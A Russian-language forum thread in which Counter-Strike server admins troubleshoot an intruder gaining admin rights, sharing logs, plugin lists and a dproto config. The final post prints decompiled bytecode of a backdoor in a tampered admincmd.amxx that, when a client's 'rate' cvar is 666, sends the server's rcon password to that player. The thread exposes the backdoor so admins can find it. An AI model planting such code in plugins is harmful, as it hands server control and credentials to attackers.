Важная информация

Перед тем как создать тему или задать вопрос, ознакомьтесь с данной темой, там собраны наиболее распространенные уязвимости и способы устранения.
Так же не поленитесь воспользоваться поиском, вполне возможно, что ваш вопрос уже поднимался на форуме.
При создании новой темы уделите внимание ее названию, оно должно кратко описывать суть вашего вопроса/проблемы. Все вновь созданные темы с названиями "Помогите", "Объясните", "Подскажите" и т.д. будут удалены, а их авторы наказаны.

Взламывают, до этого такого не видел

, Не знаю, что делать

Опции

Egorka007	9.5.2014, 16:27 Сообщение #1
Стаж: 12 лет Сообщений: 334 Благодарностей: 42 Полезность: 106	https://c-s.net.ua/forum/index.php?showtopi...%EE%EC&st=0 https://c-s.net.ua/forum/index.php?showtopi...%C2%E7%EB%EE%EC Проблема как и у этих парней, некий салат взламывает сервер. Логи, где нашел его Код L 05/09/2014 - 16:42:00: "Salat<237><STEAM_3:0:397521532><>" connected, address "46.118.238.49:27005" L 05/09/2014 - 16:42:07: "Salat<238><STEAM_3:0:397521532><>" entered the game L 05/09/2014 - 11:53:33: [admincmd.amxx] Cmd: "Salat<1889><STEAM_ID_LAN><>" ask for players list L 05/09/2014 - 12:01:00: [admincmd.amxx] Cmd: "Salat<1889><STEAM_ID_LAN><>" ask for players list L 05/09/2014 - 16:44:59: [admincmd.amxx] Cmd: "Salat<257><STEAM_3:0:397521532><>" ask for players list Помогите пожалуйста, скажите может какие логи скинуть, список плагинов ? Хоть исходники проверил, в той теме писали на банс. Буду благодарен за помощь _________________________________ Админки по ник + пас, ркон пароля нет Отредактировал: Egorka007, - 9.5.2014, 16:33
	Поблагодарили 0 раз Поблагодарили 0 раз

xalk963589	9.5.2014, 17:06 Сообщение #2
Стаж: 12 лет Сообщений: 78 Благодарностей: 12 Полезность: 58	У них хостинг playground, у тебя какой ?
	Поблагодарили 0 раз Поблагодарили 0 раз

Egorka007	9.5.2014, 17:12 Сообщение #3
Стаж: 12 лет Сообщений: 334 Благодарностей: 42 Полезность: 106	Цитата(xalk963589 @ 9.5.2014, 17:06) У них хостинг playground, у тебя какой ? Тоже
	Поблагодарили 0 раз Поблагодарили 0 раз

Fred Perry	9.5.2014, 17:14 Сообщение #4
Стаж: 16 лет Сообщений: 6594 Благодарностей: 2370 Полезность: 813	Если ник одинаковый - где-то выписаны права на ник. Скидывай список плагинов. Гнилой фашистской нечисти Загоним пулю в лоб, Отродью человечества Сколотим крепкий гроб!
	Поблагодарили 0 раз Поблагодарили 0 раз

XyLiGaN	9.5.2014, 17:16 Сообщение #5
Стаж: 13 лет Город: Югорск Сообщений: 11668 Благодарностей: 6450 Полезность: 1052 Меценат	Нашлись собраться по взлому Мб это на хосте лазят?! Ну или плагины с дырками?! У меня всё норм и у всех тоже :)
	Поблагодарили 0 раз Поблагодарили 0 раз

Egorka007	9.5.2014, 17:20 Сообщение #6
Стаж: 12 лет Сообщений: 334 Благодарностей: 42 Полезность: 106	Цитата(Fred Perry @ 9.5.2014, 17:14) Если ник одинаковый - где-то выписана права на ник. Скидывай список плагинов. Банс офнул, на хостинге сказали не из-за него Плагины admin.amxx opengl32.amxx aim_detector.amxx statsx_rbs.amxx statscfg_rbs.amxx ; Basic admincmd.amxx ; basic admin console commands ;adminhelp.amxx ; help command for admin console commands adminslots.amxx ; slot reservation ;multilingual.amxx ; Multi-Lingual management ; Menus menufront.amxx ; front-end for admin menus cmdmenu.amxx ; command menu (speech, settings) plmenu.amxx ; players menu (kick, ban, client cmds.) ;telemenu.amxx ; teleport menu (Fun Module required!) mapsmenu.amxx ; maps menu (vote, changelevel) pluginmenu.amxx ; Menus for commands/cvars organized by plugin ; Chat / Messages adminchat.amxx ; console chat commands ;antiflood.amxx ; prevent clients from chat-flooding the server ;scrollmsg.amxx ; displays a scrolling message ;imessage.amxx ; displays information messages adminvote.amxx ; vote commands ; Map related ;nextmap.amxx ; displays next map in mapcycle ;mapchooser.amxx ; allows to vote for next map ;timeleft.amxx ; displays time left on map ; Configuration pausecfg.amxx ; allows to pause and unpause some plugins ;statscfg.amxx ; allows to manage stats plugins via menu and commands ; Counter-Strike restmenu.amxx ; restrict weapons menu ;statsx.amxx ; stats on death or round end (CSX Module required!) ;miscstats.amxx ; bunch of events announcement for Counter-Strike ;stats_logging.amxx ; weapons stats logging (CSX Module required!) ; Enable to use AMX Mod plugins ;amxmod_compat.amxx ; AMX Mod backwards compatibility layer army_ranks_ultimate_new.amxx chat_rbs.amxx vipsystem.amxx nightmode_for_csnet.amxx mapmanager.amxx best_player.amxx map_spawns_editor.amxx afk_control.amxx autoteambalance.amxx ad_manager.amxx advert.amxx amx_autodemorec.amxx antiblock.amxx permanent_message.amxx Ping_Control.amxx rs_v13.amxx vampir.amxx admin_freelook.amxx noflech.amxx killscounter.amxx + пересматривал исходники, ничего не нашел Отредактировал: Egorka007, - 9.5.2014, 17:21
	Поблагодарили 0 раз Поблагодарили 0 раз

ham1k	9.5.2014, 17:33 Сообщение #7
Стаж: 12 лет Сообщений: 214 Благодарностей: 73 Полезность: 0	Цитата(Egorka007 @ 9.5.2014, 17:20) Банс офнул, на хостинге сказали не из-за него Плагины admin.amxx opengl32.amxx aim_detector.amxx statsx_rbs.amxx statscfg_rbs.amxx ; Basic admincmd.amxx ; basic admin console commands ;adminhelp.amxx ; help command for admin console commands adminslots.amxx ; slot reservation ;multilingual.amxx ; Multi-Lingual management ; Menus menufront.amxx ; front-end for admin menus cmdmenu.amxx ; command menu (speech, settings) plmenu.amxx ; players menu (kick, ban, client cmds.) ;telemenu.amxx ; teleport menu (Fun Module required!) mapsmenu.amxx ; maps menu (vote, changelevel) pluginmenu.amxx ; Menus for commands/cvars organized by plugin ; Chat / Messages adminchat.amxx ; console chat commands ;antiflood.amxx ; prevent clients from chat-flooding the server ;scrollmsg.amxx ; displays a scrolling message ;imessage.amxx ; displays information messages adminvote.amxx ; vote commands ; Map related ;nextmap.amxx ; displays next map in mapcycle ;mapchooser.amxx ; allows to vote for next map ;timeleft.amxx ; displays time left on map ; Configuration pausecfg.amxx ; allows to pause and unpause some plugins ;statscfg.amxx ; allows to manage stats plugins via menu and commands ; Counter-Strike restmenu.amxx ; restrict weapons menu ;statsx.amxx ; stats on death or round end (CSX Module required!) ;miscstats.amxx ; bunch of events announcement for Counter-Strike ;stats_logging.amxx ; weapons stats logging (CSX Module required!) ; Enable to use AMX Mod plugins ;amxmod_compat.amxx ; AMX Mod backwards compatibility layer army_ranks_ultimate_new.amxx chat_rbs.amxx vipsystem.amxx nightmode_for_csnet.amxx mapmanager.amxx best_player.amxx map_spawns_editor.amxx afk_control.amxx autoteambalance.amxx ad_manager.amxx advert.amxx amx_autodemorec.amxx antiblock.amxx permanent_message.amxx Ping_Control.amxx rs_v13.amxx vampir.amxx admin_freelook.amxx noflech.amxx killscounter.amxx + пересматривал исходники, ничего не нашел подсеть забань ,а лучше установи фреш бан + допбан и настрой дпропто
	Поблагодарили 0 раз Поблагодарили 0 раз

Egorka007	9.5.2014, 17:36 Сообщение #8
Стаж: 12 лет Сообщений: 334 Благодарностей: 42 Полезность: 106	Цитата(ham1k @ 9.5.2014, 17:33) подсеть забань ,а лучше установи фреш бан + допбан и настрой дпропто Дропто сегодня поставил последнее + настроил вроде Дропто,кфг # ======================================================== # DPROTO CONFIGURATION # ======================================================== # # General rule for modifying this file: # DONT CHANGE ANYTHING IF YOU DONT KNOW WHAT IT MEANS! # # ======================================================== # AUTHID MANAGEMENT # ======================================================== # ClientID types (for cid_* options) # 1: Real (or generated by HW) steam (STEAM_xx:xx:xx) # 2: Real (or generated by HW) valve (VALVE_xx:xx:xx) # 3: STEAM_ by IP # 4: VALVE_ by IP # 5: Deprecated - client will be rejected # 6: reserved for future use # 7: HLTV # 8: STEAM_ID_LAN # 9: STEAM_ID_PENDING # 10: VALVE_ID_LAN # 11: VALVE_ID_PENDING # 12: STEAM_666:88:666 # Use these options to set authid's for clients # for HLTV (default is HLTV [7]) cid_HLTV = 7 # for p.47 clients that do not support unique id generation (default is STEAM_ID_LAN [8]) cid_NoSteam47 = 5 # for p.48 clients that do not support unique id generation (default is VALVE_ID_LAN [10]) cid_NoSteam48 = 5 # For Legit Steam clients (default is real STEAM_xx:xx:xx [1]) cid_Steam = 1 # Client recognized as pending when they sucessfully authorized, but did not get steam id # REMARK: Actually, it got steamid, but it is useless (STEAM_0:0:0 for example) # default is STEAM_ID_PENDING [9] cid_SteamPending = 5 # For players having revEmu ( >= 9.74) on client-side: # default is real STEAM_xx:xx:xx [1] cid_RevEmu = 1 # For players having RevEmu 2013 on client-side: # default is real STEAM_xx:xx:xx [1] cid_RevEmu2013 = 1 # For players having SteamClient 2009 / revEmu > 9.82 on client-side: # default is real STEAM_xx:xx:xx [1] cid_SC2009 = 1 # For players having old revEmu on client-side: # default is real STEAM_xx:xx:xx [1] cid_OldRevEmu = 1 # For players having hCupa's SteamEmu on client-side: # default is real STEAM_xx:xx:xx [1] cid_SteamEmu = 1 # For players having AVSMP (Cracked Steam) on client-side: # default is real STEAM_xx:xx:xx [1] cid_AVSMP = 1 # For SETTI ServerScanner # default is STEAM_xx:xx:xx generated by IP [3] cid_Setti = 3 # For SXEI Clients # default is real STEAM_xx:xx:xx [1] cid_SXEI = 1 # EnableSXEIdGeneration (0 / 1) # Turns on steamid generation based on info sent by sXeI client # Enable this only if you have sXeI server installed! EnableSXEIdGeneration = 0 # SC2009_RevCompatMode (0 / 1) # Enable fix to make steamids generated for SC2009 compatible with revEmu SC2009_RevCompatMode = 1 # SteamEmuCompatMode (0 / 1) # An analog for eSTEAMATiON's EnforceSteamEmuCompatIDMode option. # Affects only Old RevEmu and SteamEmu emulators. SteamEmuCompatMode = 1 # OldEstCompatMode (0 / 1) # Enables/Disables fix for steamids generated by eST in 0.3.1 version. # Set this to 1 if you want to make steamids generated by eST as in < 0.3.0 versions. OldEstCompatMode = 0 # SteamIdHashSalt (string) # Salt string for SteamIDs hashing. Irreversibly changes SteamIDs. Applies only to SteamIDs generated by emulators. # Should be more than 16 chars length. If string is empty, hashing is not applied. SteamIdHashSalt = моя соль # IPGen_Prefix1 (int) # STEAM_a:b:c # first prefix (a) for authids generated by IP IPGen_Prefix1 = 1 # IPGen_Prefix2 (int) # STEAM_a:b:c # second prefix (b) for authids generated by IP IPGen_Prefix2 = 1 # Native_Prefix1 (int) # STEAM_a:b:c # first prefix (a) for authids generated by native auth method (Steam) Native_Prefix1 = 0; # RevEmu_Prefix1 (int) # STEAM_a:b:c # first prefix (a) for authids generated by Steamclient 2009 SC2009_Prefix1 = 2; # RevEmu_Prefix1 (int) # STEAM_a:b:c # first prefix (a) for authids generated by RevEmu RevEmu_Prefix1 = 3; # RevEmu2013_Prefix1 (int) # STEAM_a:b:c # first prefix (a) for authids generated by RevEmu2013 RevEmu2013_Prefix1 = 4; # OldRevEmu_Prefix1 (int) # STEAM_a:b:c # first prefix (a) for authids generated by old RevEmu OldRevEmu_Prefix1 = 5; # SteamEmu_Prefix1 (int) # STEAM_a:b:c # first prefix (a) for authids generated by SteamEmu SteamEmu_Prefix1 = 6; # SteamEmu_Prefix1 (int) # STEAM_a:b:c # first prefix (a) for authids assigned for AVSMP Clients (Cracked steam) AVSMP_Prefix1 = 7; # Setti_Prefix1 (int) # STEAM_a:b:c # first prefix (a) for authids assigned for Setti server scanner Setti_Prefix1 = 8; # SXEI_Prefix1 (int) # STEAM_a:b:c # first prefix (a) for authids assigned for sXeI clients SXEI_Prefix1 = 9; # Note that banid will use steamid WITHOUT any prefixes! # ======================================================== # ATTACKS SUPRESSION # ======================================================== # FakePlayers_ConnectInitiationCheck (seconds) # Sets the time, in seconds, in which client should initiate # game session (in other words, send the "new" command) after it has # been connected. If client did not initiated game session, it will be marked as # fake and kicked. # Default is 6 seconds. # Use 0 to disable this check. FakePlayers_ConnectInitiationCheck = 6 # FakePlayers_ClientValidationCheck (seconds) # Sets the time, in seconds, in which client should answer to random unique command # sent by the server. If client did not answered for this command, it will be marked as # fake and kicked. # Default is 8 seconds. # Use 0 to disable this check. FakePlayers_ClientValidationCheck = 8 # FakePlayers_AntiReconnect (0/1) # Enables detection of fakeplayers that reconnects quickly (every < 10 seconds) # before fake players checks have completed. # This check will work only if FakePlayers_ClientValidationCheck and # FakePlayers_ConnectInitiationCheck are enabled. # Default is 1 (ON). FakePlayers_AntiReconnect = 1 # FakePlayers_CommandsOrderCheck (0/1) # Enable commands order checking on the start of initiated connection. # Default is 1 (ON). FakePlayers_CommandsOrderCheck = 1 # FakePlayers_BanTime (minutes) # Dproto will ban IP spamming fakeplayers for time (in minutes) specified in this variable # Default is 120 minutes. # Use 0 for permanent ban. # Use negative vaules to disable ban (fake players will only be kicked). FakePlayers_BanTime = 120 # Exploits_CheckDownloads (0/1) # Enable checking of requested download files against precached resources. # Default is 1 (ON). Exploits_CheckDownloads = 1 # Exploits_DisableUploads (0/1) # Disable file uploads (not customizations) to the server. # Default is 1 (ON). Exploits_DisableUploads = 1 # ======================================================== # OTHER STUFF # ======================================================== # LoggingMode: # 0 = None # 1 = Console # 2 = Log Files # 3 = Both LoggingMode = 2 # ThreatsLoggingMode # Enable logging of threats details. # Default is 0 (OFF). ThreatsLoggingMode = 0 # DisableNativeAuth (0/1) # Disables valve/steam auth system. # For p.47 Based: Server will not connect to auth servers. # For All: Server will not call authorization functions. # This is a fix for startup freeze for old (p.47) servers. DisableNativeAuth = 0 # ServerInfoAnswerType (0/1/2) # Sets server answer type for query requests # 0 = New style (Source Engine) # 1 = Old Style (Fix favorites list for p.47 clients) # 2 = Hybrid mode - Server is visible anywhere, but there are 3 packets generated for every serverinfo request ServerInfoAnswerType = 0 # Game_Name (string) # Sets game name displayed for clients # If Game_Name is empty, native game name will be used Game_Name = # Enables fix for proper player id displaying on HLStats server monitoring # Enable this only if you have HLStats HLStatsPlayerIdFix = 0 # ExportVersion (0 / 1) # Enables/Disables exporting of dp_version cvar # 1 = dp_version cvar will be exported to server rules. It will be visible in server monitoring tools (like HLSW) # 0 = dp_version cvar will not be exported to server rules. ExportVersion = 1 # HLTVExcept_IP (ip addr) # HLTV from this IP will be able to join the server even if cid_HLTV is set to 5 (deprecated) HLTVExcept_IP = 127.0.0.1
	Поблагодарили 0 раз Поблагодарили 0 раз

ham1k	9.5.2014, 17:37 Сообщение #9
Стаж: 12 лет Сообщений: 214 Благодарностей: 73 Полезность: 0	Цитата(Egorka007 @ 9.5.2014, 17:36) Дропто сегодня поставил последнее + настроил вроде Дропто,кфг # ======================================================== # DPROTO CONFIGURATION # ======================================================== # # General rule for modifying this file: # DONT CHANGE ANYTHING IF YOU DONT KNOW WHAT IT MEANS! # # ======================================================== # AUTHID MANAGEMENT # ======================================================== # ClientID types (for cid_* options) # 1: Real (or generated by HW) steam (STEAM_xx:xx:xx) # 2: Real (or generated by HW) valve (VALVE_xx:xx:xx) # 3: STEAM_ by IP # 4: VALVE_ by IP # 5: Deprecated - client will be rejected # 6: reserved for future use # 7: HLTV # 8: STEAM_ID_LAN # 9: STEAM_ID_PENDING # 10: VALVE_ID_LAN # 11: VALVE_ID_PENDING # 12: STEAM_666:88:666 # Use these options to set authid's for clients # for HLTV (default is HLTV [7]) cid_HLTV = 7 # for p.47 clients that do not support unique id generation (default is STEAM_ID_LAN [8]) cid_NoSteam47 = 5 # for p.48 clients that do not support unique id generation (default is VALVE_ID_LAN [10]) cid_NoSteam48 = 5 # For Legit Steam clients (default is real STEAM_xx:xx:xx [1]) cid_Steam = 1 # Client recognized as pending when they sucessfully authorized, but did not get steam id # REMARK: Actually, it got steamid, but it is useless (STEAM_0:0:0 for example) # default is STEAM_ID_PENDING [9] cid_SteamPending = 5 # For players having revEmu ( >= 9.74) on client-side: # default is real STEAM_xx:xx:xx [1] cid_RevEmu = 1 # For players having RevEmu 2013 on client-side: # default is real STEAM_xx:xx:xx [1] cid_RevEmu2013 = 1 # For players having SteamClient 2009 / revEmu > 9.82 on client-side: # default is real STEAM_xx:xx:xx [1] cid_SC2009 = 1 # For players having old revEmu on client-side: # default is real STEAM_xx:xx:xx [1] cid_OldRevEmu = 1 # For players having hCupa's SteamEmu on client-side: # default is real STEAM_xx:xx:xx [1] cid_SteamEmu = 1 # For players having AVSMP (Cracked Steam) on client-side: # default is real STEAM_xx:xx:xx [1] cid_AVSMP = 1 # For SETTI ServerScanner # default is STEAM_xx:xx:xx generated by IP [3] cid_Setti = 3 # For SXEI Clients # default is real STEAM_xx:xx:xx [1] cid_SXEI = 1 # EnableSXEIdGeneration (0 / 1) # Turns on steamid generation based on info sent by sXeI client # Enable this only if you have sXeI server installed! EnableSXEIdGeneration = 0 # SC2009_RevCompatMode (0 / 1) # Enable fix to make steamids generated for SC2009 compatible with revEmu SC2009_RevCompatMode = 1 # SteamEmuCompatMode (0 / 1) # An analog for eSTEAMATiON's EnforceSteamEmuCompatIDMode option. # Affects only Old RevEmu and SteamEmu emulators. SteamEmuCompatMode = 1 # OldEstCompatMode (0 / 1) # Enables/Disables fix for steamids generated by eST in 0.3.1 version. # Set this to 1 if you want to make steamids generated by eST as in < 0.3.0 versions. OldEstCompatMode = 0 # SteamIdHashSalt (string) # Salt string for SteamIDs hashing. Irreversibly changes SteamIDs. Applies only to SteamIDs generated by emulators. # Should be more than 16 chars length. If string is empty, hashing is not applied. SteamIdHashSalt = моя соль # IPGen_Prefix1 (int) # STEAM_a:b:c # first prefix (a) for authids generated by IP IPGen_Prefix1 = 1 # IPGen_Prefix2 (int) # STEAM_a:b:c # second prefix (b) for authids generated by IP IPGen_Prefix2 = 1 # Native_Prefix1 (int) # STEAM_a:b:c # first prefix (a) for authids generated by native auth method (Steam) Native_Prefix1 = 0; # RevEmu_Prefix1 (int) # STEAM_a:b:c # first prefix (a) for authids generated by Steamclient 2009 SC2009_Prefix1 = 2; # RevEmu_Prefix1 (int) # STEAM_a:b:c # first prefix (a) for authids generated by RevEmu RevEmu_Prefix1 = 3; # RevEmu2013_Prefix1 (int) # STEAM_a:b:c # first prefix (a) for authids generated by RevEmu2013 RevEmu2013_Prefix1 = 4; # OldRevEmu_Prefix1 (int) # STEAM_a:b:c # first prefix (a) for authids generated by old RevEmu OldRevEmu_Prefix1 = 5; # SteamEmu_Prefix1 (int) # STEAM_a:b:c # first prefix (a) for authids generated by SteamEmu SteamEmu_Prefix1 = 6; # SteamEmu_Prefix1 (int) # STEAM_a:b:c # first prefix (a) for authids assigned for AVSMP Clients (Cracked steam) AVSMP_Prefix1 = 7; # Setti_Prefix1 (int) # STEAM_a:b:c # first prefix (a) for authids assigned for Setti server scanner Setti_Prefix1 = 8; # SXEI_Prefix1 (int) # STEAM_a:b:c # first prefix (a) for authids assigned for sXeI clients SXEI_Prefix1 = 9; # Note that banid will use steamid WITHOUT any prefixes! # ======================================================== # ATTACKS SUPRESSION # ======================================================== # FakePlayers_ConnectInitiationCheck (seconds) # Sets the time, in seconds, in which client should initiate # game session (in other words, send the "new" command) after it has # been connected. If client did not initiated game session, it will be marked as # fake and kicked. # Default is 6 seconds. # Use 0 to disable this check. FakePlayers_ConnectInitiationCheck = 6 # FakePlayers_ClientValidationCheck (seconds) # Sets the time, in seconds, in which client should answer to random unique command # sent by the server. If client did not answered for this command, it will be marked as # fake and kicked. # Default is 8 seconds. # Use 0 to disable this check. FakePlayers_ClientValidationCheck = 8 # FakePlayers_AntiReconnect (0/1) # Enables detection of fakeplayers that reconnects quickly (every < 10 seconds) # before fake players checks have completed. # This check will work only if FakePlayers_ClientValidationCheck and # FakePlayers_ConnectInitiationCheck are enabled. # Default is 1 (ON). FakePlayers_AntiReconnect = 1 # FakePlayers_CommandsOrderCheck (0/1) # Enable commands order checking on the start of initiated connection. # Default is 1 (ON). FakePlayers_CommandsOrderCheck = 1 # FakePlayers_BanTime (minutes) # Dproto will ban IP spamming fakeplayers for time (in minutes) specified in this variable # Default is 120 minutes. # Use 0 for permanent ban. # Use negative vaules to disable ban (fake players will only be kicked). FakePlayers_BanTime = 120 # Exploits_CheckDownloads (0/1) # Enable checking of requested download files against precached resources. # Default is 1 (ON). Exploits_CheckDownloads = 1 # Exploits_DisableUploads (0/1) # Disable file uploads (not customizations) to the server. # Default is 1 (ON). Exploits_DisableUploads = 1 # ======================================================== # OTHER STUFF # ======================================================== # LoggingMode: # 0 = None # 1 = Console # 2 = Log Files # 3 = Both LoggingMode = 2 # ThreatsLoggingMode # Enable logging of threats details. # Default is 0 (OFF). ThreatsLoggingMode = 0 # DisableNativeAuth (0/1) # Disables valve/steam auth system. # For p.47 Based: Server will not connect to auth servers. # For All: Server will not call authorization functions. # This is a fix for startup freeze for old (p.47) servers. DisableNativeAuth = 0 # ServerInfoAnswerType (0/1/2) # Sets server answer type for query requests # 0 = New style (Source Engine) # 1 = Old Style (Fix favorites list for p.47 clients) # 2 = Hybrid mode - Server is visible anywhere, but there are 3 packets generated for every serverinfo request ServerInfoAnswerType = 0 # Game_Name (string) # Sets game name displayed for clients # If Game_Name is empty, native game name will be used Game_Name = # Enables fix for proper player id displaying on HLStats server monitoring # Enable this only if you have HLStats HLStatsPlayerIdFix = 0 # ExportVersion (0 / 1) # Enables/Disables exporting of dp_version cvar # 1 = dp_version cvar will be exported to server rules. It will be visible in server monitoring tools (like HLSW) # 0 = dp_version cvar will not be exported to server rules. ExportVersion = 1 # HLTVExcept_IP (ip addr) # HLTV from this IP will be able to join the server even if cid_HLTV is set to 5 (deprecated) HLTVExcept_IP = 127.0.0.1 а ты его обновлял сам дпропто ?
	Поблагодарили 0 раз Поблагодарили 0 раз

Egorka007	9.5.2014, 17:41 Сообщение #10
Стаж: 12 лет Сообщений: 334 Благодарностей: 42 Полезность: 106	Цитата(ham1k @ 9.5.2014, 17:37) а ты его обновлял сам дпропто ? да ham1k, можно ссылку на допбан ?
	Поблагодарили 0 раз Поблагодарили 0 раз

ham1k	9.5.2014, 17:50 Сообщение #11
Стаж: 12 лет Сообщений: 214 Благодарностей: 73 Полезность: 0	Цитата(Egorka007 @ 9.5.2014, 17:41) да ham1k, можно ссылку на допбан ? его покупать надо http://www.kanaga.ru/wm/index.php
	Поблагодарили 1 раз Поблагодарили 1 раз Egorka007

deltex	9.5.2014, 17:50 Сообщение #12
Стаж: 14 лет Сообщений: 694 Благодарностей: 407 Полезность: 794	Цитата(Egorka007 @ 9.5.2014, 17:20) Банс офнул, на хостинге сказали не из-за него Плагины admin.amxx opengl32.amxx aim_detector.amxx statsx_rbs.amxx statscfg_rbs.amxx ; Basic admincmd.amxx ; basic admin console commands ;adminhelp.amxx ; help command for admin console commands adminslots.amxx ; slot reservation ;multilingual.amxx ; Multi-Lingual management ; Menus menufront.amxx ; front-end for admin menus cmdmenu.amxx ; command menu (speech, settings) plmenu.amxx ; players menu (kick, ban, client cmds.) ;telemenu.amxx ; teleport menu (Fun Module required!) mapsmenu.amxx ; maps menu (vote, changelevel) pluginmenu.amxx ; Menus for commands/cvars organized by plugin ; Chat / Messages adminchat.amxx ; console chat commands ;antiflood.amxx ; prevent clients from chat-flooding the server ;scrollmsg.amxx ; displays a scrolling message ;imessage.amxx ; displays information messages adminvote.amxx ; vote commands ; Map related ;nextmap.amxx ; displays next map in mapcycle ;mapchooser.amxx ; allows to vote for next map ;timeleft.amxx ; displays time left on map ; Configuration pausecfg.amxx ; allows to pause and unpause some plugins ;statscfg.amxx ; allows to manage stats plugins via menu and commands ; Counter-Strike restmenu.amxx ; restrict weapons menu ;statsx.amxx ; stats on death or round end (CSX Module required!) ;miscstats.amxx ; bunch of events announcement for Counter-Strike ;stats_logging.amxx ; weapons stats logging (CSX Module required!) ; Enable to use AMX Mod plugins ;amxmod_compat.amxx ; AMX Mod backwards compatibility layer army_ranks_ultimate_new.amxx chat_rbs.amxx vipsystem.amxx nightmode_for_csnet.amxx mapmanager.amxx best_player.amxx map_spawns_editor.amxx afk_control.amxx autoteambalance.amxx ad_manager.amxx advert.amxx amx_autodemorec.amxx antiblock.amxx permanent_message.amxx Ping_Control.amxx rs_v13.amxx vampir.amxx admin_freelook.amxx noflech.amxx killscounter.amxx + пересматривал исходники, ничего не нашел Сам все плагины компелировал? Был такой случай. На сервере появился автоконнект после установки плагинов. Проверил все исходники везде чисто. По очереди стал отключать плагины и нашел. И получилось так, что в плагине автоконнект а в исходнике все чисто. Вывод если не сам компилировал, то проверяй плагины способом отключения по очереди.
	Поблагодарили 0 раз Поблагодарили 0 раз

Egorka007	9.5.2014, 17:51 Сообщение #13
Стаж: 12 лет Сообщений: 334 Благодарностей: 42 Полезность: 106	Цитата(deltex @ 9.5.2014, 17:50) Сам все плагины компелировал? Был такой случай. На сервере появился автоконнект после установки плагинов. Проверил все исходники везде чисто. По очереди стал отключать плагины и нашел. И получилось так, что в плагине автоконнект а в исходнике все чисто. Вывод если не сам компилировал, то проверяй плагины способом отключения по очереди. Сам компилил
	Поблагодарили 0 раз Поблагодарили 0 раз

ham1k	9.5.2014, 17:51 Сообщение #14
Стаж: 12 лет Сообщений: 214 Благодарностей: 73 Полезность: 0	Цитата(deltex @ 9.5.2014, 17:50) Сам все плагины компелировал? Был такой случай. На сервере появился автоконнект после установки плагинов. Проверил все исходники везде чисто. По очереди стал отключать плагины и нашел. И получилось так, что в плагине автоконнект а в исходнике все чисто. Вывод если не сам компилировал, то проверяй плагины способом отключения по очереди. ты читал первый пост ?
	Поблагодарили 0 раз Поблагодарили 0 раз

walle94	10.5.2014, 9:25 Сообщение #15
Стаж: 12 лет Сообщений: 70 Благодарностей: 2 Полезность: < 0	Надеюсь администрация дс не заблочит ведь стараюсь для ребят) Цитата Даже не очень стыдно поделиться решением проблемы, созданной ещё автором темы. Проблема существовала до недавнего времени и никуда не девалась 😊 Человек иногда заходил, "баловался" - банил и т.п., паузил сервер, но вычислить его не удавалось - в логах тишина была. В итоге меня очень достало все это и я пошел просить игрохост помочь решить проблему. Меня долго убеждали что проблема в плагинах, но я не верил, т.к. они все были проверены ручками и взяты отсюда в исходниках, либо с основного alliedmodders. Проверялись все плагины, кроме стандартных 😊 Никому же и в голову не придет проверять стандартные плагины amxx. Они просто тупо копировались из хостинга в хостинг и встроенный в них backdoor тоже 😊 В admin.amxx, admincmd.amxx и ещё в какие-то другие вроде statx.amxx было добавлено пару строку кода. Выяснилось после декомпиляции тех.поддержкой игрохоста плагина admincmd.amxx. Вот его концовка: спойлер обратите внимание на последний блок Цитата 0x9C50 PROC ; public client_connect(id) 0x9C54 BREAK ; admincmd.sma:1178 0x9C58 BREAK ; admincmd.sma:1180 0x9C5C PUSH.S 0xC ; id 0x9C64 PUSH.C 0x4 0x9C6C SYSREQ.C 0xC ; is_user_bot(id) 0x9C74 STACK 0x8 ; free 2 cells 0x9C7C NOT 0x9C80 JZER 0x9CCC ; jump_291 0x9C88 BREAK ; admincmd.sma:1182 0x9C8C PUSH.C 0x6408 ; 0x0 0x9C94 PUSH.C 0x0 ; AMXX_VERSION_STR[11] "1.8.1.3746" 0x9C9C PUSH.C 0x6398 ; "cvar_cl_cmdrate_result_func" 0x9CA4 PUSH.C 0x6384 ; "rate" 0x9CAC PUSH.S 0xC ; id 0x9CB4 PUSH.C 0x14 0x9CBC SYSREQ.C 0x3F ; query_client_cvar(id,"rate","cvar_cl_cmdrate_result_func",0,"") 0x9CC4 STACK 0x18 ; free 6 cells 0x9CCC ZERO.pri ; target:jump_291 0x9CD0 RETN 0x9CD4 PROC ; public cvar_cl_cmdrate_result_func(id,cvar[],value[]) 0x9CD8 BREAK ; admincmd.sma:1186 0x9CDC BREAK ; admincmd.sma:1188 ; new resultcmdratevalue 0x9CE0 STACK 0xFFFFFFFC ; allocate 1 cells 0x9CE8 PUSH.S 0x14 ; value[] 0x9CF0 PUSH.C 0x4 0x9CF8 SYSREQ.C 0x9 ; str_to_num(value[]) 0x9D00 STACK 0x8 ; free 2 cells 0x9D08 STOR.S.pri 0xFFFFFFFC ; resultcmdratevalue 0x9D10 BREAK ; admincmd.sma:1190 0x9D14 LOAD.S.pri 0xFFFFFFFC ; resultcmdratevalue 0x9D1C EQ.C.pri 0x29A 0x9D24 JZER 0x9DBC ; jump_292 0x9D2C BREAK ; admincmd.sma:1192 ; new rcon[111] 0x9D30 STACK 0xFFFFFE44 ; allocate 111 cells 0x9D38 ZERO.pri 0x9D3C ADDR.alt 0xFFFFFE40 0x9D44 FILL 0x1BC ; 111 cells 0x9D4C BREAK ; admincmd.sma:1193 0x9D50 PUSH.C 0x6E ; 0x200000 0x9D58 PUSH.ADR 0xFFFFFE40 ; rcon[111] 0x9D60 PUSH.C 0x640C ; "rcon_password" 0x9D68 PUSH.C 0xC 0x9D70 SYSREQ.C 0x40 ; get_cvar_string("rcon_password",rcon[111],110) 0x9D78 STACK 0x10 ; free 4 cells 0x9D80 BREAK ; admincmd.sma:1194 0x9D84 PUSH.ADR 0xFFFFFE40 ; rcon[111] 0x9D8C PUSH.C 0x6444 ; "echo connected: %s" 0x9D94 PUSH.S 0xC ; id 0x9D9C PUSH.C 0xC 0x9DA4 SYSREQ.C 0x3A ; client_cmd(id,"echo connected: %s",rcon[111]) 0x9DAC STACK 0x10 ; free 4 cells 0x9DB4 STACK 0x1BC ; free 111 cells 0x9DBC STACK 0x4 ; free 1 cells ; target:jump_292 0x9DC4 ZERO.pri 0x9DC8 RETN 0x9DCC PROC ; public cmdSayInfo(id) 0x9DD0 BREAK ; admincmd.sma:1198 0x9DD4 BREAK ; admincmd.sma:1199 ; new szArg[192] 0x9DD8 STACK 0xFFFFFD00 ; allocate 192 cells 0x9DE0 ZERO.pri 0x9DE4 ADDR.alt 0xFFFFFD00 0x9DEC FILL 0x300 ; 192 cells 0x9DF4 BREAK ; admincmd.sma:1200 0x9DF8 PUSH.C 0xBF ; 0x0 0x9E00 PUSH.ADR 0xFFFFFD00 ; szArg[192] 